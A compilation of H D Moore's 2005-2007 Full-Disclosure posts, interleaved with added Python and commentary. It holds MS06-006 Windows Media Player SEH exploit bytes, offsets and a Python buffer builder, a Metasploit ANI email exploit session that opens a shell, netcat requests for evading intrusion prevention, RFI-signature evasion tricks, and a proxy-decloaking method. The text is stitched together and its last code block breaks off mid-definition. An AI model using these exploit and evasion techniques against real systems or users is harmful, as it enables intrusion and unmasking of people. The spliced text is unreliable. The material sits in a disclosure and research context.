substr($pattern, 2090, length($shellcode), $shellcode);

my $content   = "";


On Thursday 16 February 2006 19:15, c0ntex wrote:
> On 16/02/06, H D Moore <[EMAIL PROTECTED]> wrote:
> > Still getting some annoying crashes (SEH trick in alphanum code is
> > annoying when you are trying to debug something...), but the basic
> > solution is:
>
> Ye, we are on the same path if you looked at my notes, SEH works
> flawlessly and can redirect no problem, but getting the stable
> location to have it go is the problem. I had to reject the "pass
> shellcode in the src="" method as I am finding your Alpha shellcode
> skechy and not 100% alpha :p due to the FF and other annoying
> characters, which cause it to bork.
>
> I'm working on another method which is looking more realistic but I
> need to wait til tomorrow now as I need to sleep  :)
>
> --
>
> regards
> c0ntex


Re: [Full-disclosure] MS06-0[0]6 Windows Media Player Exploitation [CODE]

2006-02-17 Thread H D Moore
On Friday 17 February 2006 02:05, Matthew Murphy wrote:
> Interesting issue with regards to the module-list pointers.  
[ snip ] 

> The heap spray technique works very effectively -- you end up with a
> *sizable* pad in the 0x04a0 region which you can use as a direct
> jump point for the payload, without any of the fancy frame manipulation
> tricks that I am too tired to try at this hour of the night/morning.

Nice :-)

> This should also be (theoretically) version-independent.  Thanks to the
> similarities of the heap management APIs and the fact that most DLLs
> from MS use high bases, I'd bet money that this works across WMP
> versions on anything from NT 4.0 to 2003. 

I ran into problems with Skylined's alphanumeric GetPC code - on Windows 
XP SP2, the SEH GetPC doesn't work from inside another SEH handler (our 
shellcode is one, since we smash SEH on the way down). Did some fancy 
8086 instructions to get around this (thanks vlad902 - the human 
assembler), so, for fwiw:

my $getpc = 
"\x58\x58\x58". # pop eax, pop eax, pop eax
"\x05\x18\x29\x29\x29". # add eax,0x29292918
"\x2d\x01\x29\x29\x29". # sub eax,0x29292901 (net +0x17, the distance from the frame to the shellcode)
"\x50\x59"; # push eax, pop ecx

substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr] 
substr($pattern, 2086, 4, pack('V', $addr));
substr($pattern, 2090, length($getpc), $getpc);
substr($pattern, 2090 + length($getpc), length($shellcode), $shellcode);

> It's likely, as well, that 
> this one technique works on any script-enabled browser that supports
> the plugin with the same results.

I tested my code across Opera/Firefox on 2000/XP/2003 - when I get some 
more time I will play with the heap spray method and see if that works 
cross-browser/os/version as well. Looks like heap spray is the way to go, 
at least for Firefox...

> 'Nuff teasing.  Code attached.  It is important to note that you should
> read the inline disclaimer *BEFORE* using the code.

Thanks for sharing!

-HD
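The three messages above describe one layout: "ABC=" over the next-SEH pointer, a handler address with no byte above 0x7F, and a GetPC stub whose add/sub pair moves eax from the frame address to the shellcode. The reason "ABC=" works is that 0x3D is cmp eax, imm32, so the four handler bytes that follow are consumed as an immediate rather than executed. As an added example (not code from the thread, and not Pex), the Python below builds that buffer at the posted offsets with the posted wmp.dll address, and then steps through the bytes with a tiny interpreter covering only the opcodes involved, to show where execution lands. The filler byte, the dummy stack values and the assumption that the third pop yields the frame address (on XP, the saved fs:[0] chain head that ntdll's ExecuteHandler2 pushed, which equals the corrupted record when it heads the chain) are mine; the thread only reports that the stub works.

```python
import struct

# Bytes from the thread: the 15-byte SEH-safe GetPC stub and the four
# alphanumeric bytes written over the next-SEH pointer.
GETPC_STUB = (b"\x58\x58\x58"             # pop eax; pop eax; pop eax
              b"\x05\x18\x29\x29\x29"     # add eax, 0x29292918
              b"\x2d\x01\x29\x29\x29"     # sub eax, 0x29292901   (net +0x17)
              b"\x50\x59")                # push eax; pop ecx
NEXT_SEH = b"ABC="                        # inc ecx; inc edx; inc ebx; cmp eax, imm32


def is_low_byte_address(addr):
    """Rule 2 of the first message: every byte of the little-endian
    address must be in 0x01..0x7F."""
    return all(0 < b < 0x80 for b in struct.pack("<I", addr))


def build_seh_buffer(seh_offset, handler, shellcode, total_len, filler=b"A"):
    """Place next_seh | handler | GetPC stub | shellcode at seh_offset,
    mirroring the substr() calls in the thread (2082 / 2086 / 2090).
    The filler is a constructed stand-in for Pex::Text::AlphaNumText."""
    if not is_low_byte_address(handler):
        raise ValueError("handler 0x%08x has a byte outside 0x01..0x7F" % handler)
    payload = NEXT_SEH + struct.pack("<I", handler) + GETPC_STUB + shellcode
    if seh_offset + len(payload) > total_len:
        raise ValueError("payload does not fit in %d bytes" % total_len)
    buf = bytearray((filler * total_len)[:total_len])
    buf[seh_offset:seh_offset + len(payload)] = payload
    return bytes(buf)


def trace_handler(buf, frame_off):
    """Interpret only the opcodes the trick relies on, starting where the
    pop/pop/ret in the handler returns to: the next-SEH bytes.
    frame_off plays the role of the EXCEPTION_REGISTRATION address. The
    stack model (assumed, see lead-in) is what remains of the dispatcher
    frame after pop/pop/ret: [ContextRecord*][DispatcherContext*][frame*].
    Returns (ip, ecx) as buffer offsets once 'pop ecx' has executed."""
    M = 0xFFFFFFFF
    stack = [0x0012FF00, 0x0012FE00, frame_off]   # constructed dummies, top first
    eax = 0
    ip = frame_off
    while True:
        op = buf[ip]
        if op in (0x41, 0x42, 0x43):        # inc ecx / inc edx / inc ebx: harmless
            ip += 1
        elif op == 0x3D:                    # cmp eax, imm32: swallows the handler bytes
            ip += 5
        elif op == 0x58:                    # pop eax
            eax = stack.pop(0); ip += 1
        elif op == 0x05:                    # add eax, imm32
            eax = (eax + struct.unpack_from("<I", buf, ip + 1)[0]) & M; ip += 5
        elif op == 0x2D:                    # sub eax, imm32
            eax = (eax - struct.unpack_from("<I", buf, ip + 1)[0]) & M; ip += 5
        elif op == 0x50:                    # push eax
            stack.insert(0, eax); ip += 1
        elif op == 0x59:                    # pop ecx: stub finished
            return ip + 1, stack.pop(0)
        else:
            raise ValueError("opcode 0x%02x at offset %d not modelled" % (op, ip))


if __name__ == "__main__":
    buf = build_seh_buffer(2082, 0x07694b1e, b"\xcc" * 16, 4096)
    ip, ecx = trace_handler(buf, 2082)
    print("falls through at frame+0x%x, ecx = frame+0x%x, shellcode at frame+0x%x"
          % (ip - 2082, ecx - 2082, 4 + 4 + len(GETPC_STUB)))
```

The arithmetic the interpreter confirms: 4 (next_seh) + 4 (handler) + 15 (stub) = 23 = 0x17, which is exactly 0x29292918 - 0x29292901, so ecx points at the first shellcode byte, and execution reaches the same place by falling through the stub. The two immediates are split that way so that neither contains a NUL or a byte above 0x7F.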


Re: [Full-disclosure] MS06-0[0]6 Windows Media Player Exploitation [CODE]

2006-02-17 Thread H D Moore
Works well against Firefox 1.5.0.1 on the following systems:
- Windows XP SP2
- Windows 2003 SP0
- Windows 2000 SP4

However, it does not work with Opera 8.5 on any platform. Should just be a 
matter of changing return addresses based on the user-agent though...

-HD

On Friday 17 February 2006 02:05, Matthew Murphy wrote:
> The heap spray technique works very effectively -- you end up with a
> *sizable* pad in the 0x04a0 region which you can use as a direct
> jump point for the payload, without any of the fancy frame manipulation
> tricks that I am too tired to try at this hour of the night/morning.


Re: [Full-Disclosure] USB risks - working autorun example (fwd from pen-test)

2006-03-21 Thread H D Moore
These work great:
http://www.udrw.com/

-HD

On Tuesday 21 March 2006 11:24, Pego, Victor wrote:
> Hi,
>
> I need to figure out how to autorun a file on a USB flash pen drive.
> Just like you can do with a CD - put it in and it starts running the
> program - I want to do with the pen drive. I've read that they're not
> the same and you can't do it. but there are companies who sell the pen
> drives with autorun software or something, they promote it. i've
> searched for a long time, can't find anything. maybe i can make the
> program - the powerpoint file for example - self-execute somehow? any
> help?
>
> Thanks!!!
>
> Victor Pego
>


[Full-disclosure] Fun with DHTML

2006-03-22 Thread H D Moore
How many bugs can you find in your browser? The recent IE issues only scratched 
the surface of the DHTML/behavior bugs. The HTML/JS page below can be 
used to find all sorts of bugs in different browsers. I stopped caring 
about these after the first three invalid dereferences.

http://metasploit.com/users/hdm/tools/hamachi/hamachi.html

-HD

PS. If you find something easily exploitable, at least give the vendor a 
heads-up. Some of the new folks on the MS IE team are the same people who 
posted bugs to this list a couple years ago, so cut them some slack :-)



Re: [Full-disclosure] Fun with DHTML

2006-03-23 Thread H D Moore
On Thursday 23 March 2006 13:44, Georgi Guninski wrote:
> a triple more reasons to send all of your 0days to m$:

Can always count on you Georgi :-)

> 1. only you can save mankind
> (they still need you, so it is not clear if several years old
> tru$tworthy computing can save mankind)

You are the ONE!

> 2. help bill get richer

Hell yeah, can't let that IKEA guy take the title for richest man!

> 3. help m$ security engineers get bigger bonus/salary for handling the
> "incident" properly

If that means they pay for drinks next time I am in Seattle, more power to 
them. Would you prefer that money to go to the security engineer or to 
the anti-ODF marketing campaign? The way I see it, the more cash 
Microsoft diverts into the security, the less they will be spending on 
efforts I disagree with :-)

-HD



Re: [Full-disclosure] RE: Oracle read-only user can insert/update/delete data

2006-04-11 Thread H D Moore
I don't believe you understand - the exploit details were available to 
anyone who could access Metalink. Alexander did not disclose these flaws, 
the Oracle user who posted the bug report did. The only reason Oracle 
takes security seriously is because folks like Mr. Kornbrust and Mr. 
Litchfield aren't afraid to publish their findings when the vendor tries 
to cover up yet another embarrassing software flaw.

-HD

On Wednesday 12 April 2006 00:38, Van Winssen, Andre A SITI-ITIBHW5 wrote:
> Alexander,
> I have to say it once again: your company is very careless and
> irresponsible for publishing so much detail about this new oracle
> security flaw for which no patch exists yet, endangering many customer
> production databases.



Re: [Full-disclosure] Sample Packet Captures

2007-02-14 Thread H D Moore
It might be more effective to contribute to the Wireshark Wiki:
 - http://wiki.wireshark.org/SampleCaptures

-HD

On Wednesday 14 February 2007 11:17, crazy frog crazy frog wrote:
> As it is not possible for everyone to setup different networks
> quickly,I am thinking to start a wiki which will contain various
> packet captures .It will help people in quickly getting the required
> dump for analysis/refrence purpose. I have started a wiki here:-
> http://secgeeks.com/packetland
> i would like to hear your feedback regarding this.feel free to upload
> any packet dump you might have.



[Full-disclosure] Metasploit Framework 3.0 RELEASED!

2007-03-26 Thread H D Moore
March 27th, 2007 -- Metasploit is pleased to announce the immediate,
free availability of the Metasploit Framework version 3.0 from
http://framework.metasploit.com/.


The Metasploit Framework ("Metasploit") is a development platform for
creating security tools and exploits. Version 3.0 contains 177
exploits, 104 payloads, 17 encoders, and 3 nop modules. Additionally,
30 auxiliary modules are included that perform a wide range of tasks,
including host discovery, protocol fuzzing, and denial of service testing. 

Metasploit is used by network security professionals to perform
penetration tests, system administrators to verify patch
installations, product vendors to perform regression testing, and
security researchers world-wide. The framework is written in the Ruby
programming language and includes components written in C and
assembler.  

Metasploit runs on all modern operating systems, including Linux,
Windows, Mac OS X, and most flavors of BSD. Metasploit has been used
on a wide range of hardware platforms, from massive Unix mainframes to
the tiny Nokia n800 handheld. Users can access Metasploit using the
tab-completing console interface, the command line scripting 
interface, or the AJAX-enabled web interface. The Windows version of
Metasploit includes all software dependencies and a selection of useful
networking tools. 

The latest version of the Metasploit Framework, as well as screen
shots, video demonstrations, documentation and installation
instructions for many platforms, can be found online at
http://framework.metasploit.com/


Metasploit 3 is a from-scratch rewrite of Metasploit 2 using the Ruby
scripting language. The development process took nearly two years to
complete and resulted in over 100,000 lines of Ruby code. As such,
there are some notable differences between version 2.7 and 3.0:
 
 * The Fs, Sys, Net, and Process extensions in the Metasploit 2.7
 Meterpreter have been combined into a single extension that is
 automatically loaded in Metasploit 3. The "stdapi" extension can be
 used to manipulate files, list and manage processes, migrate the
 payload into a new process, edit a file on the server, forward a
 port, execute a command, and many other tasks. The "priv" extension
 (accessible by the "use priv" command) provides the hashdump command
 for dumping password hashes and the timestomp command for erasing
 file system timestamps.  

 * The Meterpreter shell provides an "irb" command that allows
 interactive scripting of a compromised system. One of the features of
 the Metasploit client API is the ability to read and write the
 memory of any accessible process on the exploited system, all from
 inside a Ruby shell. When combined with a Meterpreter script (started
 with the "run" command from inside Meterpreter), this feature can be
 used to backdoor running applications or steal in-memory credentials.

 * The Metasploit console provides an "irb" command (on Unix systems
 only) that allows direct access to the Ruby internals at runtime.
 This can be used to modify the behavior of the framework, interact
 with existing connections, and as a development environment for
 plugins.
 
 * The Metasploit console interface has a new "route" command that
 allows all network connections to a given subnet to be routed through
 an existing session. This can be used in conjunction with the
 Meterpreter payload to relay attacks through exploited systems.
 
 * Database support is provided via a set of plugins and a standard
 command interface. The database can be used to track host information
 during a penetration test and launch automated attacks against a
 network (db_autopwn). The current release can import both Nessus NBE
 files and Nmap XML output files. Data provided by these tools can be
 used to cross-reference open ports and vulnerabilities with
 Metasploit modules. 
 
 * User options have been separated into three types: standard,
 advanced, and evasion. Evasion options allow the user to bypass IDS
 and IPS systems by specifying how exploit data is generated and
 delivered. Evasion options are available for most exploits, with
 particular attention paid to the SMB, DCERPC, and HTTP protocols.
 
 * A plugin system allows developers to add their own commands to the
 console interface, hook framework events, and extend the framework at
 runtime without having to modify the base code. Example plugins have
 been included in the "plugins" subdirectory of the framework. Example
 plugins include an "auto-tagger", a socket filter, a telnet service,
 and a number of database and debugging plugins.
 
 * An event subscription system allows modules and plugins to wait for
 specific events and automatically perform different actions. This
 feature can be used to hook socket operations, filter data flows,
 and automate post-exploitation tasks. 
 
 * Metasploit modules can import methods and behaviors from a huge
 library of Ruby Mixins. This release includes support for protocols
 such as SMB

[Full-disclosure] Metasploit vs ANI

2007-04-02 Thread H D Moore
Two new exploit modules are available for version 3.0 of the Metasploit 
Framework. These modules can be obtained by using the 'Online Update' 
feature in Windows and the 'svn update' command on Unix-like systems.

Matt Miller posted to the Metasploit Blog about our ANI efforts:
http://blog.metasploit.com/

The two exploits can be viewed in the svn repository at metasploit.com:
http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb
http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/email/ani_loadimage_chunksize.rb

The first module exploits the ANI flaw through Internet Explorer. It uses 
multiple icon files referenced from a single HTML page. This allows 
client-side brute forcing without resorting to javascript. This module 
will execute code on Windows 2000, Windows XP, and Windows Vista using 
the default target. As mentioned in the blog, a command shell is not 
directly accessible on Vista, but the Meterpreter payload can be used to 
bust out of the low-privileged process :-)

The second module exploits the ANI flaw through Outlook and Outlook 
Express. It sends a multipart MIME e-mail that contains multiple icon 
files referenced from an HTML message. This allows brute forcing of the 
correct target via the mail reader, all without any form of client-side 
scripting. To use this module, point RHOST and RPORT at an SMTP server 
that will relay your email. Set the MAILFROM and MAILTO options, select a 
payload, launch the exploit, and wait for your payload to execute.

An example session from the e-mail based exploit module:

msf exploit(ani_loadimage_chunksize) > exploit
[*] Started reverse handler
[*] Connecting to SMTP server localhost:20025...
[*] SMTP: 220 slug.metasploit.com ESMTP
[*] SMTP: 250-slug.metasploit.com
250-PIPELINING
250-8BITMIME
250-AUTH LOGIN PLAIN CRAM-MD5
250 SIZE 0
[*] SMTP: 250 ok
[*] SMTP: 250 ok
[*] Sending the message (404759 bytes)...
[*] SMTP: 354 go ahead
[*] SMTP: 250 ok 1175497222 qp 12648
[*] Closing the connection...
[*] SMTP: 221 slug.metasploit.com
[*] Waiting for a payload session (backgrounding)...
[*] Exploit running as background job.
msf exploit(ani_loadimage_chunksize) > 

[*] Command shell session 1 opened (192.168.0.127: -> 
192.168.0.127:37299)

msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\program files\Outlook Express>  

Enjoy!

- The Metasploit Staff



Re: [Full-disclosure] ...Alright I need a little help....

2007-04-17 Thread H D Moore
Metasploit 2 only runs modules written in the Metasploit 2 Perl format.

Metasploit 3 only runs modules written in the Metasploit 3 Ruby format.

Keep in mind that many exploits also depend on a specific version or 
update of the Metasploit Framework. If the exploit is for Metasploit 3 
and uses the new Endpoint Mapper features, it will only work with a 
fully-updated version of Metasploit 3.0.

You can't "convert" a .rar or .c to a metasploit module directly, but you 
can "port" the exploit over if you know what you are doing.

Hope this helps,

-HD

PS. lol

On Tuesday 17 April 2007 13:46, srxnr srxnr wrote:
> So there are a few exploits written for metasploit. Now for the
> exploits written in ' .C ' for the new metasploit doesn't work like
> before. Now it reads only ruby and or perl. So far i've looked around
> in my metasploit DIR and only found there to be .rb files.
> SO is it possible to convert a .c file to .rb so i can load it in
> metasploit.



[Full-disclosure] You shady bastards.

2007-06-06 Thread H D Moore
Hello,

Some friends and I were putting together a contact list for the folks 
attending the Defcon conference this year in Las Vegas. My friend sent 
out an email, with a large CC list, asking people to respond if they 
planned on attending. The email was addressed to quite a few people, with 
one of them being David Maynor. Unfortunately, his old SecureWorks 
address was used, not his current address with ErrattaSec. 

Since one of the messages sent to the group contained a URL to our phone 
numbers and names, I got paranoid and decided to determine whether 
SecureWorks was still reading email addressed to David Maynor. I sent an 
email to David's old SecureWorks address, with a subject line promising 
0-day, and a link to a non-public URL on the metasploit.com web server 
(via SSL). Twelve hours later, someone from a Comcast cable modem in 
Atlanta tried to access the link, and this someone was (confirmed) not 
David. SecureWorks is based in Atlanta. All times are CDT.

I sent the following message last night at 7:02pm.

---
From: H D Moore 
To: David Maynor 
Subject: Zero-day I promised
Date: Tue, 5 Jun 2007 19:02:11 -0500
User-Agent: KMail/1.9.3
MIME-Version: 1.0
Content-Type: text/plain;
  charset="us-ascii"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200706051902.11544.hdm[at]metasploit.com>
Status: RO
X-Status: RSC

https://metasploit.com/maynor.tar.gz
---

Approximately 12 hours later, the following request shows up in my Apache 
log file. It looks like someone at SecureWorks is reading email addressed 
to David and tried to access the link I sent:

71.59.27.152 - - [05/Jun/2007:19:16:42 -0500] "GET /maynor.tar.gz 
HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) 
AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"

This address resolves to:
c-71-59-27-152.hsd1.ga.comcast.net

The whois information is just the standard Comcast block boilerplate.

---

Is this illegal? I could see reading email addressed to him being within 
the bounds of the law, but it seems like trying to download the "0day" 
link crosses the line.

Illegal or not, this is still pretty damned shady.

Bastards.

-HD



[Full-disclosure] IPS Evasion with the Apache HTTP Server

2007-06-19 Thread H D Moore
Summarized from https://strikecenter.bpointsys.com/

Many commercial IPS products fail to decode HTTP requests which use 0x0c, 
0x0b, and 0x0d instead of the normal 0x20/0x09 separators. A request in 
the following format will evade most IPS protocol decoders:

$ echo -ne "GET\x0c/cgi-bin/phf\x0cHTTP/1.0\r\n\r\n" | \
 nc webserver 80

A request which contains multiple CRLF sequences instead of a valid method 
is processed by Apache, yet ignored by most IPS engines:

$ echo -ne "\r\n\r\n\r\n\r\n\r\n /buggy.php HTTP/1.0\r\n\r\n" | \
 nc webserver 80

The first issue was covered more than a year ago, yet most IPS vendors 
have failed to address it. The second issue is new, as far as I know. You 
can even combine them:

$ echo -ne "\r\n\r\n\r\n\r\n\r\n\x0c/buggy.php\x0bHTTP/1.0\r\n\r\n" | \
 nc webserver 80

-HD
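The three requests above differ only in how the request line is tokenized, so the defensive counterpart is a normalizer that tokenizes the way the target server does before any URI signature is applied. As an added example (not from the post or from any IPS product), the Python below runs two decoders over the exact byte strings the echo commands send: a naive one that follows the RFC grammar, and a lenient one that treats 0x0b, 0x0c and a bare 0x0d as separators and skips CRLF sequences sent before the method, which is the behaviour the post attributes to Apache. The lenient rules are an approximation of that description, not a copy of Apache's parser.

```python
import re

# Separator sets for the request line. The RFC grammar uses SP (decoders
# usually accept HT too); the post reports that Apache additionally accepts
# 0x0b, 0x0c and 0x0d there and tolerates CRLF pairs before the method.
STRICT_SEP = rb"[ \t]+"
LENIENT_SEP = rb"[ \t\x0b\x0c\r]+"


def parse_request_line(raw, lenient=True):
    """Return (method, uri, version) for the request line in raw, or None.

    lenient=False: a decoder that trusts the RFC grammar; first line up to
                   CRLF, split on SP/HT.
    lenient=True:  normalize the way the post says Apache does, which is
                   what an IPS must do before matching a URI signature.
    """
    if lenient:
        raw = raw.lstrip(b"\r\n")
    line = raw.split(b"\r\n", 1)[0]
    sep = LENIENT_SEP if lenient else STRICT_SEP
    tokens = [t for t in re.split(sep, line) if t]
    if not tokens:
        return None
    if tokens[0].startswith(b"/"):      # separator before the URI: empty method
        tokens.insert(0, b"")
    tokens += [b""] * (3 - len(tokens))
    return tuple(tokens[:3])


def uri_signature_hit(raw, pattern, lenient=True):
    """Emulate an IPS URI signature: does `pattern` occur in the URI the
    decoder extracted? A naive decoder never sees the URI at all."""
    parsed = parse_request_line(raw, lenient)
    return parsed is not None and re.search(pattern, parsed[1]) is not None


# The three requests from the post, exactly as the echo -ne strings build them
EVASION_1 = b"GET\x0c/cgi-bin/phf\x0cHTTP/1.0\r\n\r\n"
EVASION_2 = b"\r\n\r\n\r\n\r\n\r\n /buggy.php HTTP/1.0\r\n\r\n"
EVASION_3 = b"\r\n\r\n\r\n\r\n\r\n\x0c/buggy.php\x0bHTTP/1.0\r\n\r\n"

if __name__ == "__main__":
    for req in (EVASION_1, EVASION_2, EVASION_3):
        print(repr(req))
        print("  naive  :", parse_request_line(req, lenient=False))
        print("  lenient:", parse_request_line(req))
```

The naive decoder either returns no request at all (the CRLF-prefixed case, where the first line is empty) or a "method" that contains the whole line, so a signature on the URI never fires; the lenient decoder recovers /cgi-bin/phf and /buggy.php from all three. In a real IPS the separator set should be chosen per destination server: an IIS-tuned normalizer is the wrong tool in front of Apache.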



Re: [Full-disclosure] IPS Evasion with the Apache HTTP Server

2007-06-20 Thread H D Moore
Agreed. The point was that IPS vendors have put a large amount of effort 
into normalizing IIS-specific encodings, but fail to handle 
Apache-specific quirks. 

The note in RFC 2616, Section 4.1, refers to a single CRLF before the 
Request-Line. Prepending multiple CRLFs or non-printable characters (as 
coderman mentioned) falls outside of the RFC and I consider them 
Apache-specific HTTP evasions.

Jamie has a good point about the PHP RFI signatures. Many IPS products 
(sorry, I don't want to pick on any particular vendor) will look for a 
http:// URL to detect RFI attacks. Replacing http with one of the other 
protocol handlers (zip, ftp, file, smb on windows, etc) will evade many 
of these signatures. The php://filter/resource trick is a nice hack for 
evading existing signatures while still using a http URL for the included 
PHP code.

-HD
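The RFI paragraph above makes a separate point: a signature that keys on http:// in a parameter value is evaded by any other scheme or wrapper, and the php://filter/resource form hides the http:// behind a wrapper. As an added example (not from the post or any product), the Python below contrasts such a naive rule, constructed here as a representative pattern, with a check that decodes each query value and flags any scheme prefix, PHP stream wrapper or UNC path (the "smb on windows" case). The sample URLs and the evil.example host are made up.

```python
import re
from urllib.parse import parse_qsl, unquote

# A naive RFI signature of the kind the post describes: a query parameter
# whose value starts with http:// or https://. Constructed as a
# representative rule, not copied from any IPS.
NAIVE_RFI = re.compile(r"[?&][^=&]*=https?://", re.I)

# Normalized rule: any URL scheme or PHP stream wrapper at the start of the
# decoded value (ftp://, file://, php://filter/..., data:, ...) or a UNC path.
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.-]*:(//|[^/\s])", re.I)
UNC_RE = re.compile(r"^\s*\\\\[^\\]+\\")


def naive_rfi_match(url):
    """What the http://-only signature sees."""
    return NAIVE_RFI.search(url) is not None


def rfi_candidates(url):
    """Decode each query value (twice, to catch double encoding) and return
    the (name, value) pairs that name a remote or wrapper resource."""
    query = url.partition("?")[2]
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value)      # parse_qsl already decoded once
        if SCHEME_RE.match(decoded) or UNC_RE.match(decoded):
            hits.append((name, decoded))
    return hits


# Constructed sample requests; only the last one is benign
SAMPLES = [
    "/index.php?page=http://evil.example/x.txt",
    "/index.php?page=ftp://evil.example/x.txt",
    "/index.php?page=php://filter/resource=http://evil.example/x.txt",
    "/index.php?page=%68%74%74%70://evil.example/x.txt",
    "/index.php?page=\\\\evil.example\\share\\x.txt",
    "/index.php?page=about.php&id=7",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print("%-5s %-5s %s" % (naive_rfi_match(url), bool(rfi_candidates(url)), url))
```

The any-scheme rule trades precision for coverage (a value such as "re:subject" also matches), so in practice it is scoped to parameters the application is known to pass to include/require, or used as a low-confidence signal alongside the server's own error responses.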

On Wednesday 20 June 2007 08:50, 3APA3A wrote:
> You  simply  MUST  accept  the  risk  there  is always the way to
> bypass content  filtering. IPS like doesn't protect your network by
> itself. IPS is nothing, but a tool.



Re: [Full-disclosure] IPS Evasion with the Apache HTTP Server

2007-06-20 Thread H D Moore
Apparently I can't read before 10:00am :) 3APA3A corrected me, the RFC 
states that there can actually be multiple CRLF before the start of the 
request. Time to find some coffee...

Thanks for the feedback!

-HD

On Wednesday 20 June 2007 09:19, H D Moore wrote:
> The note in RFC 2616, Section 4.1, refers to a single CRLF before the
> Request-Line.



Re: [Full-disclosure] [ GLSA 200507-05 ] zlib: Buffer overflow

2005-07-06 Thread H D Moore
Does anyone have an idea on how to trigger this? Debian and SuSE say this 
is a denial of service. Gentoo says "code execution", but they are the 
ones who found the bug. Most zlib bugs can be exploited prior to 
authentication in OpenSSH. The patch is being distributed by the 
vendors and is not on zlib.org yet:

[ inftrees.c ]
-if (left > 0 && (type == CODES || (codes - count[0] != 1)))
+if (left > 0 && (type == CODES || max != 1))
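Review bot: the hunk has no `@@` header and no context lines, so as posted it cannot be applied with patch(1) and a reader cannot see where `max` is assigned; since the fix moves the guard from a quantity visible in the line itself (`codes - count[0]`) to a variable set elsewhere, the submission should carry enough context to confirm that `max` already holds the longest code length at this point, otherwise the rejection of incomplete code sets is weakened rather than fixed. It would also help to state why `codes - count[0] != 1` was the wrong test for "exactly one code" (it is derived from the number of used symbols, not from the code lengths) so the intent of `max != 1` is reviewable instead of inferred.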

-HD

On Wednesday 06 July 2005 09:23, Thierry Carrez wrote:
> Gentoo Linux Security Advisory   GLSA 200507-05

>   Severity: High
>  Title: zlib: Buffer overflow
>   Date: July 06, 2005
>   Bugs: #98121
> ID: 200507-05
>
> A buffer overflow has been discovered in zlib, potentially resulting in
> the execution of arbitrary code.


Re: [Full-disclosure] Advice RE Site Exploit

2005-07-18 Thread H D Moore
It doesn't work that way ;-) You either get to abuse the bug or tell them 
about it; trying to do both is what gets people put into jail. In your 
communication with the company, you could always ask for a discount on 
your service or some other perk (in a polite and non-demanding way), but 
IMO that's as far as you can go without it looking like extortion.

If you left your wallet in your car with the windows down and someone 
walks up to you and tells you about it, you will have one of two 
reactions. You will be happy that someone seemed concerned for your 
well-being or pissed off that some jerk was looking into your car in the 
first place. The reaction is going to depend on how you are approached 
and what they say. If they immediately ask for $10 on the grounds that 
they could have just taken your entire wallet, you might be motivated to 
break their face. Just because someone has the potential to rob you 
doesn't mean that you should be grateful to them if they don't :-) 

-HD

On Monday 18 July 2005 19:22, David Wilde wrote:
> Hello All,
>
> Long time lurker.  I have recently come across a rather significant
> (IMHO) exploit to gain access to a significant number of accounts held
> by one of the two satellite tv companies in the US.  I of course want
> to do the right thing (TM), but I also would like a free lifetime
> subscription to all of the channels with hardware upgrades at my
> discretion :)  What is the best way of informing the company of my
> discovery and my wishes with the ultimate goal of 1) not going to jail
> being labeled a terrorist and threat to national security, and 2)
> getting what I want?
>
> TIA


Re: [Full-disclosure] vncviewer patched...

2006-05-16 Thread H D Moore
No need to patch the client at all. The Metasploit Framework module 
proxies the connection and lets you exploit the flaw with any standard 
client. If you have vncviewer in your path (or are running the Windows 
version of the Framework), it also auto-connects :-)

-HD

http://metasploit.com/projects/Framework/exploits.html#realvnc_41_bypass

On Tuesday 16 May 2006 12:22, evilrabbi wrote:
> Hello,
>
> In case anyone was having trouble patching the vnc client I've supplied
> a patched binary that can be downloaded at
> http://www.nopsled.net/code/vncviewer.exe
>
> -- evilrabbi



Re: [Full-disclosure] Finding Function in Import Address Tables (IATs)

2006-05-22 Thread H D Moore
Install the Metasploit Framework (v2.5), then use msfpescan:

$ msfpescan -f something.dll -D | grep IAT

-HD

On Monday 22 May 2006 10:43, Andres Molinetti wrote:
>   I want to find if a specific function is defined in a given set of
> dlls' IAT (Import Address Table).
>   Does anyone know a tool to perform this check?



[Full-disclosure] UnAnonymizer

2006-06-26 Thread H D Moore
A fun browser toy that depends on Java for complete results:
- http://metasploit.com/research/misc/decloak/

-HD



Re: [Full-disclosure] UnAnonymizer

2006-06-27 Thread H D Moore
If your real internal and external NAT addresses did not appear when using 
a proxy, either the Java applet did not load or a race condition failed. 
From browsing the database backend, it looks like just over 1,000 people 
were successfully identified (internal + nat gw + external + dns). The 
database is wiped every 24 hours.

The 'trick' is to obtain this information regardless of proxy settings 
and in the case of SOCKS4, be able to identify your real DNS servers. 
This is accomplished using a custom DNS service along with a Java applet 
that abuses the DatagramSocket/GetByName APIs to bypass any configured 
proxy. The source code of the applet is online as well:
- http://metasploit.com/research/misc/decloak/HelloWorld.java

There are a handful of other ways to obtain a user's real IP address - you 
can embed a link to a SMB service over a UNC path, start up another 
application via file attachments (PDF, with embedded JS, etc), or abuse 
any other network-aware app that is launched by the browser.

The goal of the "decloak" code is to provide a javascript-friendly way to 
obtain this information that doesn't notify the user that something 
strange is happening. A great use of this code would be to track down the 
real source of a malicious request being routed through a TOR exit node. 

Take this a step further by adding smart filtering and injection code to 
the TOR client itself and you have a solution for detecting and reporting 
"bad" traffic that happens to exit through your node (attempted server 
exploitation, pornography not involving adults, etc). My current 
implementation uses an embedded ruby interpreter and a set of ruby modules 
to perform the protocol detection and filtering.

Thanks for testing!

-HD

On Monday 26 June 2006 20:07, H D Moore wrote:
> A fun browser toy that depends on Java for complete results:
> - http://metasploit.com/research/misc/decloak/
>
> -HD

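The server-side half of the trick, as an added example that is not the decloak code itself: the web server, the custom DNS server and the applet's direct datagram each see the visitor from a different vantage point, and a per-visit token in the URL, in the query name and in the datagram joins them. The `Event` shape, the `decloak.example` zone and the events below are constructed; that the applet's datagram carries the token and the local address it reports is my assumption about what it sends.

```python
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional

# Zone the custom DNS service answers for (hypothetical; the page uses its own).
ZONE = "decloak.example"


class Event(NamedTuple):
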